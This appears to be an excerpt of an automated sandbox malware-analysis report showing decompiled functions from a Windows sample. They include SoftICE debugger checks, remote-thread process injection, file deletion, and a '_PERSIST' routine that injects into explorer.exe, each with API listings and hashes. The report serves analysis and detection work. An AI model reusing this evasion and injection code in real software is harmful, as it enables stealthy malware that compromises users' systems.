				_t1 = CreateFileA("\\\\.\\NTICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}





                                    0x00405851
                                    0x0040586a
                                    0x00405872
                                    0x00405875
                                    0x0040587a
                                    0x0040587a
                                    0x0040587f

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040586A
                                    • CloseHandle.KERNEL32(00000000,\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405875
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\NTICE
                                    • API String ID: 3498533004-2502798147
                                    • Opcode ID: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction ID: dcdfadaa743e4582149ecbcd816e92e043e7093f062ec94bd67b511fcc83bcd2
                                    • Opcode Fuzzy Hash: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction Fuzzy Hash: 27D0CAB238170039F83438A92C97F1A440C9701B29EA0833ABB20BA1E1C4A8AA29021C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405814, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405814() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\SICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}





                                    0x00405815
                                    0x0040582e
                                    0x00405836
                                    0x00405839
                                    0x0040583e
                                    0x0040583e
                                    0x00405843

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040582E
                                    • CloseHandle.KERNEL32(00000000,\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405839
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\SICE
                                    • API String ID: 3498533004-948585333
                                    • Opcode ID: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction ID: 3ad54f1ae86a7dc7f46777f6809a8286594d703ee9eb335483981d0cf1385b1e
                                    • Opcode Fuzzy Hash: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction Fuzzy Hash: B8D012723C170039F83038A51C97F07400C5701B2DEB08336BB10BD1E1C4F8B619051C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405A28, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 52%
                                    			E00405A28(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				void* _t13;
				int _t24;
				intOrPtr _t36;
				intOrPtr _t37;
				CHAR* _t40;
				void* _t42;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t45 = __eflags;
				_t42 = _t43;
				_t44 = _t43 + 0xfffffff8;
				_push(__ebx);
				_v8 = __eax;
				E00401F38(_v8);
				_push(_t42);
				_push(0x405ac7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				_v9 = 0;
				_t13 = E00405D04(_v8, __ebx, _t45); // executed
				if(_t13 != 0) {
					_push(_t42);
					_push(0x405aa7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					_t40 = E00401F48(_v8);
					GetFileAttributesA(_t40); // executed
					SetFileAttributesA(_t40, 0); // executed
					_t24 = DeleteFileA(_t40); // executed
					asm("sbb eax, eax");
					_v9 = _t24 + 1;
					_pop(_t37);
					 *[fs:eax] = _t37;
				}
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00405ACE);
				return E00401AC0( &_v8);
			}














                                    0x00405a28
                                    0x00405a29
                                    0x00405a2b
                                    0x00405a2e
                                    0x00405a31
                                    0x00405a37
                                    0x00405a3e
                                    0x00405a3f
                                    0x00405a44
                                    0x00405a47
                                    0x00405a4a
                                    0x00405a51
                                    0x00405a58
                                    0x00405a5c
                                    0x00405a5d
                                    0x00405a62
                                    0x00405a65
                                    0x00405a70
                                    0x00405a73
                                    0x00405a89
                                    0x00405a8f
                                    0x00405a97
                                    0x00405a9a
                                    0x00405a9f
                                    0x00405aa2
                                    0x00405aa2
                                    0x00405ab3
                                    0x00405ab6
                                    0x00405ab9
                                    0x00405ac6

                                    APIs
                                      • Part of subcall function 00405D04: FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                      • Part of subcall function 00405D04: FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A73
                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A89
                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A8F
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesFind$CloseDeleteFirst
                                    • String ID:
                                    • API String ID: 996707796-0
                                    • Opcode ID: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
                                    • Instruction ID: 1c4186debc08bb4691b9d877f2086b3288a94b326db33eea14d01e2d90e30b07
                                    • Opcode Fuzzy Hash: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
                                    • Instruction Fuzzy Hash: 52110230324644AED702DB658C12A9F7BECDB0A704F6204BAF400E22D2D67D5E00DA68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004038AC, Relevance: 4.6, APIs: 3, Instructions: 51synchronizationthreadinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004038AC(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
				void* _v8;
				long _v12;
				long _v16;
				void* _t16;
				void* _t23;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 = __ecx;
				_t31 = __edx;
				_t23 = __eax;
				_t33 = E0040387C(__eax, _a8, _v8);
				_t16 = CreateRemoteThread(_t23, 0, 0, E0040387C(_t23, E004037DC(__edx), _t31), _t33, 0,  &_v16); // executed
				_t32 = _t16;
				if(_a4 != 0) {
					WaitForSingleObject(_t32, 0xffffffff);
					ReadProcessMemory(_t23, _t33, _v8, _a8,  &_v12);
				}
				return _t32;
			}











                                    0x004038b5
                                    0x004038b8
                                    0x004038ba
                                    0x004038c9
                                    0x004038ea
                                    0x004038ef
                                    0x004038f5
                                    0x004038fa
                                    0x0040390d
                                    0x0040390d
                                    0x0040391a

                                    APIs
                                      • Part of subcall function 0040387C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                      • Part of subcall function 0040387C: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                    • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID:
                                    • API String ID: 3966641755-0
                                    • Opcode ID: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction ID: 98dfc2b63562e43be382328cbb186e20acb4a9321053857b4be2ba9adcb19dad
                                    • Opcode Fuzzy Hash: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction Fuzzy Hash: D9018F717001087BD710EA6E8C81FAFBBED8B89325F20857AB518E73C1D974DE0083A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040555C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E0040555C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t28;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t52;

				_t52 = __eflags;
				_t48 = __esi;
				_t47 = __edi;
				_t50 = _t51;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t50);
				_push(0x405607);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_push(_t50);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_v8 = 0x100;
				E00402074( &_v12, _v8);
				GetUserNameA(E00401F48(_v12),  &_v8); // executed
				_pop(_t41);
				 *[fs:eax] = _t41;
				E00404740(_v12, __ebx,  &_v16, __edi, __esi, _t52);
				_push(_v16);
				E00404740("CurrentUser", __ebx,  &_v20, _t47, _t48, _t52);
				_pop(_t28);
				E00401E94(_t28, _v20);
				_t45 = 0x4055b2;
				 *[fs:eax] = _t45;
				_push(E0040560E);
				return E00401AE4( &_v20, 3);
			}













                                    0x0040555c
                                    0x0040555c
                                    0x0040555c
                                    0x0040555d
                                    0x00405561
                                    0x00405562
                                    0x00405563
                                    0x00405564
                                    0x00405565
                                    0x00405566
                                    0x00405567
                                    0x0040556a
                                    0x0040556b
                                    0x00405570
                                    0x00405573
                                    0x00405578
                                    0x0040557e
                                    0x00405581
                                    0x00405584
                                    0x00405591
                                    0x004055a3
                                    0x004055aa
                                    0x004055ad
                                    0x004055ca
                                    0x004055d2
                                    0x004055db
                                    0x004055e3
                                    0x004055e4
                                    0x004055ee
                                    0x004055f1
                                    0x004055f4
                                    0x00405606

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,00000100), ref: 004055A3
                                      • Part of subcall function 00404740: CharUpperA.USER32(?,00000000,004047B5), ref: 0040477E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CharNameUpperUser
                                    • String ID: CurrentUser
                                    • API String ID: 2323927870-4020899948
                                    • Opcode ID: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction ID: 79fc34cd5b686bd2ad1a611b0b6b124d48364b0ba66751db6594d0a242cb1dd3
                                    • Opcode Fuzzy Hash: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction Fuzzy Hash: 65117375514604BEDB05DB91DC56CAF77BCE749700B91487AF400E3680D7786E048964
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004013A4, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004013A4(intOrPtr __eax, intOrPtr* __edx) {
				char _v276;
				CHAR* _t7;
				long _t9;
				intOrPtr* _t12;
				CHAR* _t17;
				intOrPtr _t18;
				void* _t19;

				_t12 = __edx;
				_t18 = __eax;
				E00401AC0(__edx);
				_t20 = _t18;
				if(_t18 == 0) {
					_t9 = GetModuleFileNameA(0,  &_v276, 0x105); // executed
					return E00401BAC(_t12, _t9, _t19, _t20);
				}
				_t17 = GetCommandLineA();
				while(1) {
					_t7 = E004012B8(_t17, _t12);
					_t17 = _t7;
					__eflags = _t18;
					if(_t18 == 0) {
						break;
					}
					__eflags =  *_t12;
					if( *_t12 != 0) {
						_t18 = _t18 - 1;
						continue;
					}
					break;
				}
				return _t7;
			}










                                    0x004013ad
                                    0x004013af
                                    0x004013b3
                                    0x004013b8
                                    0x004013ba
                                    0x004013c8
                                    0x00000000
                                    0x004013d3
                                    0x004013df
                                    0x004013e1
                                    0x004013e5
                                    0x004013ea
                                    0x004013ec
                                    0x004013ee
                                    0x00000000
                                    0x00000000
                                    0x004013f0
                                    0x004013f3
                                    0x004013f5
                                    0x00000000
                                    0x004013f5
                                    0x00000000
                                    0x004013f3
                                    0x00401401

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013C8
                                    • GetCommandLineA.KERNEL32(?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013DA
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CommandFileLineModuleName
                                    • String ID:
                                    • API String ID: 2151003578-0
                                    • Opcode ID: af4a5eb0bc67ba89c9692b8dc5ebedf84787e4a76e86bf27e6dddde34da4ddc0
                                    • Instruction ID: bfab612d428c5fdc4c3d8e73d94946365303e54022b79f8a2b9667094a9042cc
                                    • Opcode Fuzzy Hash: af4a5eb0bc67ba89c9692b8dc5ebedf84787e4a76e86bf27e6dddde34da4ddc0
                                    • Instruction Fuzzy Hash: 11F0A022B01B1097E721A16E0C8276E21C58BC8764F59017FBE49FBBE1EA7CCC45529A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406660, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00406660(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00401F48(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                    0x0040666b
                                    0x00406673
                                    0x0040667c
                                    0x0040667d
                                    0x00406680
                                    0x00406680

                                    APIs
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,004066BB,00000000,00406794,?,?,00000000,00000000,00000000,00000000), ref: 0040666B
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction ID: fca0ec8dcb75db4ffbb1fbdbb764ae01d2ede40a2229cdd6f6647931c02f8f91
                                    • Opcode Fuzzy Hash: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction Fuzzy Hash: B8C08CE02012000ADE10A9FE0CC1A1A02C80E1437AB602F7BF039F33E2E27F88322028
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403566, Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00403566(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                    0x0040356b
                                    0x00403573
                                    0x0040357e
                                    0x00403584

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction ID: 72f15282d468185fbe7a0b5f937441395a77a4796b686d6b9836a445fb31a29c
                                    • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction Fuzzy Hash: 6ED0127325024CBFC700EEBDCC05DAB33DC9718609B008425B918C7100D139EA508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403568, Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00403568(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                    0x0040356b
                                    0x00403573
                                    0x0040357e
                                    0x00403584

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction ID: b1e9c139d53b74868f197cdea1108a814add3867d20bcc7908f8201953e61f5a
                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction Fuzzy Hash: 0FC0127315024CABC700EEBDCC05D9B33DC5718609B008425B518C7100D139E6508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040115D, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlReAllocateHeap.NTDLL(00490000,00000000), ref: 0040116D
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction ID: de04998b76c7b9bc537c8d7dd9716f6d6fbeb3d3f43a7f0598963b3529812e59
                                    • Opcode Fuzzy Hash: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction Fuzzy Hash: 08B092B2500100AAD740D799DD42F4222ACA30C348F840C647248F31A1D13CA420472C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401122, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00401122(long __eax) {
				long _t2;
				void* _t4;

				_t2 =  *0x40d03c; // 0x0
				_t4 = RtlAllocateHeap( *0x40e590, _t2, __eax); // executed
				return _t4;
			}





                                    0x00401125
                                    0x00401131
                                    0x00401136

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00490000,00000000), ref: 00401131
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction ID: c8d19fe016ae2e0651702f7a29d851e7a2fc058706c9609f530dee1e772ded5c
                                    • Opcode Fuzzy Hash: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction Fuzzy Hash: 65B092A5A00000AFE640E7ED9E40E2223ECA70C2083800C247208E3162E13898104728
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401139, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 27%
                                    			E00401139(void* __eax) {
				signed int _t2;
				signed int _t5;

				_t2 =  *0x40d03c; // 0x0
				_t5 = HeapFree( *0x40e590, _t2 & 0x00000001, ??); // executed
				asm("sbb eax, eax");
				return  ~_t5 & 0x0000007f;
			}





                                    0x0040113c
                                    0x0040114b
                                    0x00401153
                                    0x0040115b

                                    APIs
                                    • HeapFree.KERNEL32(00490000,00000000), ref: 0040114B
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction ID: 0196c5bfe9261146ad4c3cc9aab034bd4c3b0778a6c2e215fe72248fa00cbfe1
                                    • Opcode Fuzzy Hash: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction Fuzzy Hash: 47C08CB3220101ABDB0087E9DDC2D6622ECB208208B140C21F908EB061E13EC8A40228
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 0040B7FC, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 85processthreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 65%
                                    			E0040B7FC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v96;
				intOrPtr _t21;
				void* _t44;
				intOrPtr* _t50;
				intOrPtr _t53;
				void* _t62;

				_push(__ebx);
				_push(__esi);
				_v96 = 0;
				_push(_t62);
				_push(0x40b8fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t62 + 0xffffffa4;
				_t50 =  *0x40d204; // 0x40e8f8
				E00401D9C( &_v96, "_PERSIST",  *_t50);
				_t44 = E00403568(0, 0, E00401F48(_v96));
				if(GetLastError() != 0xb7) {
					CloseHandle(_t44);
					_t21 =  *0x40d1cc; // 0x40e924
					_t59 = E00401F9C(_t21);
					GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
					if(E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t27, "_PERSIST", _t22, __edi, _t22) == 0) {
						E00403738();
						E00403738();
						CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v92,  &_v24);
						E004040F4(_v24.hProcess, _v24.hProcess, "_PERSIST", _t59, __edi, _t59);
					}
				} else {
					CloseHandle(_t44);
				}
				_pop(_t53);
				 *[fs:eax] = _t53;
				_push(E0040B901);
				return E00401AC0( &_v96);
			}












                                    0x0040b802
                                    0x0040b803
                                    0x0040b806
                                    0x0040b80b
                                    0x0040b80c
                                    0x0040b811
                                    0x0040b814
                                    0x0040b817
                                    0x0040b827
                                    0x0040b83e
                                    0x0040b84a
                                    0x0040b858
                                    0x0040b85d
                                    0x0040b867
                                    0x0040b87a
                                    0x0040b89c
                                    0x0040b8a6
                                    0x0040b8b3
                                    0x0040b8d3
                                    0x0040b8df
                                    0x0040b8df
                                    0x0040b84c
                                    0x0040b84d
                                    0x0040b84d
                                    0x0040b8e6
                                    0x0040b8e9
                                    0x0040b8ec
                                    0x0040b8f9

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040B8FA), ref: 0040B840
